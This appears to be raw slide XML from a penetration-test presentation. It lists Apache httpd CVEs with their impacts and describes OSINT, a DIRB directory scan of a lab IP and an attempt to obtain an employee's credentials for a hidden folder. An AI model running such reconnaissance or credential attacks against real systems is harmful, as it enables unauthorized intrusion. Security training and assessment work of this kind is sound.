                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2018-1312</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection. </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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>May allow an attacker to execute a successful Man in the Middle attack, gaining compromising credentials. Can also allow an attacker to execute a pass-the-hash attack.</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1118900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2017-15715</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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>In Apache httpd 2.4.0 to 2.4.29, the expression specified in &lt;FilesMatch&gt; could </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.</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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Due to this lack of proper input </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>sanitization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>, this vulnerability may allow a malicious actor to upload harmful files. Said files could allow the attacker to further exploit the system. </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670075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-10082</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.</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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> client could perform a DoS attack by flooding a connection with requests and basically  never reading response on the TCP connection.</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Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;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1"/>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Using OSINT, our team found mention of hidden files as well as the roles of users listed on the website in the “Meet the Team” . By using DIRB, a web content scanner, hidden directory paths were discovered on the web server. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1092" name="Google Shape;1092;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3" name="Google Shape;1093;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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1095" name="Google Shape;1095;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6" name="Google Shape;1096;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7" name="Google Shape;1097;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1"/>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By traversing the directories listed in "Meet the Team" we discovere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>d that an employee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>listed a hidden directory that he managed. With this information we attempted to gain this employee’s credentials to further access the system by attempting to gain access into the locked folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1100" name="Google Shape;1100;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1" name="Google Shape;1101;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2" name="Google Shape;1102;p61"/>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1"/>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a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>irb http://192.168.1.105</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4885824" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="50840" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4885825" y="0"/>
            <a:ext cx="4421699"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